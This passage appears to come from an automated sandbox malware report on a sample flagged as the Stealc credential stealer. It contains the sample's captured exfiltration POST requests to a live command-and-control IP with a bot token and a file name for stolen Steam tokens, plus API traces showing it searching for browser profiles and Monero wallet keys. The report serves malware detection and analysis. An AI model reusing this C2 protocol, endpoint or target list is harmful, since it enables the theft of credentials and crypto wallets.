6f 6d 0a 2e 63 2e 62 69 6e 67 2e 63 6f 6d 0a 2e 63 31 2e 6d 69 63 72 [TRUNCATED] Data Ascii: .pl<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>.ar<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.office.com.microsoft.com.microsoft.com.microsoft.comsupport.microsoft.com.microsoft.com.c1.microsoft.comsupport.microsoft.com.c.bing.com.c1.microsoft.com.bing.com.microsoft.comsupport.microsoft.com.c.bing.com.c.bing.com.c1.microsoft.comlogin.microsoftonline.comsupport.microsoft.com.microsoft.comlogin.microsoftonline.com.google.com<br>*.br<br> 1.google.comsupport.microsoft.comsupport.microsoft.comsupport.microsoft.comsupport.offi
Sep 26, 2024 00:39:18.591068029 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJKJDBFIIDHJKEHJEH Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4b 4a 44 42 46 49 49 44 48 4a 4b 45 48 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CBKJKJDBFIIDHJKEHJEHContent-Disposition: form-data; name="file"------CBKJKJDBFIIDHJKEHJEH--
Sep 26, 2024 00:39:19.321530104 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:39:19.392426014 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBA Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 2d 2d 0d 0a Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="message"files------EHIIIJDAAAAAAKECBFBA--
Sep 26, 2024 00:39:19.617341042 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 00:39:19.620852947 CEST	473	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGIDGCGIEGDGDGDGHJK Host: 185.215.113.37 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 66 32 33 30 61 30 30 36 63 36 61 39 34 36 30 64 33 37 33 64 65 33 65 66 64 64 66 37 62 35 37 39 36 66 64 36 32 66 64 63 62 32 36 63 35 38 64 35 30 33 35 63 35 66 30 33 64 37 32 66 38 39 30 35 62 34 66 37 66 61 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 49 44 47 43 47 49 45 47 44 47 44 47 44 47 48 4a 4b 2d 2d 0d 0a Data Ascii: ------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="token"3f230a006c6a9460d373de3efddf7b5796fd62fdcb26c58d5035c5f03d72f8905b4f7faa------GCGIDGCGIEGDGDGDGHJKContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GCGIDGCGIEGDGDGDGHJK--
Sep 26, 2024 00:39:20.330708027 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 22:39:19 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=78 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Target ID:	0
Start time:	18:38:53
Start date:	25/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x250000
File size:	1'837'568 bytes
MD5 hash:	0E61D1E023F371C6BA74939512E40085
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1936049768.0000000000D87000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1936049768.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1659118085.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00269860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00D423C8), ref: 002698A1
GetProcAddress.KERNEL32(74DD0000,00D42350), ref: 002698BA
GetProcAddress.KERNEL32(74DD0000,00D42368), ref: 002698D2
GetProcAddress.KERNEL32(74DD0000,00D42218), ref: 002698EA
GetProcAddress.KERNEL32(74DD0000,00D42380), ref: 00269903
GetProcAddress.KERNEL32(74DD0000,00D49138), ref: 0026991B
GetProcAddress.KERNEL32(74DD0000,00D35A90), ref: 00269933
GetProcAddress.KERNEL32(74DD0000,00D358D0), ref: 0026994C
GetProcAddress.KERNEL32(74DD0000,00D423E0), ref: 00269964
GetProcAddress.KERNEL32(74DD0000,00D423F8), ref: 0026997C
GetProcAddress.KERNEL32(74DD0000,00D424D0), ref: 00269995
GetProcAddress.KERNEL32(74DD0000,00D42230), ref: 002699AD
GetProcAddress.KERNEL32(74DD0000,00D35730), ref: 002699C5
GetProcAddress.KERNEL32(74DD0000,00D42290), ref: 002699DE
GetProcAddress.KERNEL32(74DD0000,00D42440), ref: 002699F6
GetProcAddress.KERNEL32(74DD0000,00D35790), ref: 00269A0E
GetProcAddress.KERNEL32(74DD0000,00D42458), ref: 00269A27
GetProcAddress.KERNEL32(74DD0000,00D42470), ref: 00269A3F
GetProcAddress.KERNEL32(74DD0000,00D356D0), ref: 00269A57
GetProcAddress.KERNEL32(74DD0000,00D42488), ref: 00269A70
GetProcAddress.KERNEL32(74DD0000,00D35A70), ref: 00269A88
LoadLibraryA.KERNEL32(00D42590,?,00266A00), ref: 00269A9A
LoadLibraryA.KERNEL32(00D42548,?,00266A00), ref: 00269AAB
LoadLibraryA.KERNEL32(00D425A8,?,00266A00), ref: 00269ABD
LoadLibraryA.KERNEL32(00D425D8,?,00266A00), ref: 00269ACF
LoadLibraryA.KERNEL32(00D425C0,?,00266A00), ref: 00269AE0
GetProcAddress.KERNEL32(75A70000,00D42560), ref: 00269B02
GetProcAddress.KERNEL32(75290000,00D42530), ref: 00269B23
GetProcAddress.KERNEL32(75290000,00D42518), ref: 00269B3B
GetProcAddress.KERNEL32(75BD0000,00D42578), ref: 00269B5D
GetProcAddress.KERNEL32(75450000,00D35810), ref: 00269B7E
GetProcAddress.KERNEL32(76E90000,00D491B8), ref: 00269B9F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00269BB6

Strings

NtQueryInformationProcess, xrefs: 00269BAA

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 8c9eb6154bd79255c199b860d97c31e8ef9a0f5c1f66c4307d7fa28e4f106a64
Instruction ID: 790d19588cc73e2c711f681f8f84a26ea7270df8154aecad8e5d391739929acf
Opcode Fuzzy Hash: 8c9eb6154bd79255c199b860d97c31e8ef9a0f5c1f66c4307d7fa28e4f106a64
Instruction Fuzzy Hash: F7A1ADB5510200AFC344EFA9FD89A6277F9F7AC301714457BA609C3234DB399865CBDA

Function 002545C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000), ref: 0025460E
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0025479C

Strings

The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0025466D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254683
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002546D8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254638
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002545F3
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002546B7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002546CD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0025475A
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002545D2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0025474F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254622
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002545DD
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254643
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254678
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002545E8
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254765
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254770
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254657
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254713
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0025477B
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002545C7
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254617
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002546C2
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0025462D
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 002546AC
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00254734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0025473F
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0025471E

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeapProtectVirtual
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 1542196881-2218711628
Opcode ID: 781c07762217b6ac3be96178fa903dd61cd2777176b24299db87a6c1d961b244
Instruction ID: 47ad1aa5233ea782ac7afe787eaef00ce6d27528cdc41625233a1eac9f123b63
Opcode Fuzzy Hash: 781c07762217b6ac3be96178fa903dd61cd2777176b24299db87a6c1d961b244
Instruction Fuzzy Hash: 664109307F2714AAE636B7E48841FADB65ADF47F08F539048E8085A295CBF0656CC936

Function 0025BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

FindFirstFileA.KERNEL32(00000000,?,00270B32,00270B2B,00000000,?,?,?,002713F4,00270B2A), ref: 0025BEF5
StrCmpCA.SHLWAPI(?,002713F8), ref: 0025BF4D
StrCmpCA.SHLWAPI(?,002713FC), ref: 0025BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0025C7BF
FindClose.KERNEL32(000000FF), ref: 0025C7D1

Strings

Preferences, xrefs: 0025C11E
\Brave\Preferences, xrefs: 0025C1DB
Brave, xrefs: 0025C102
Google Chrome, xrefs: 0025C634

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
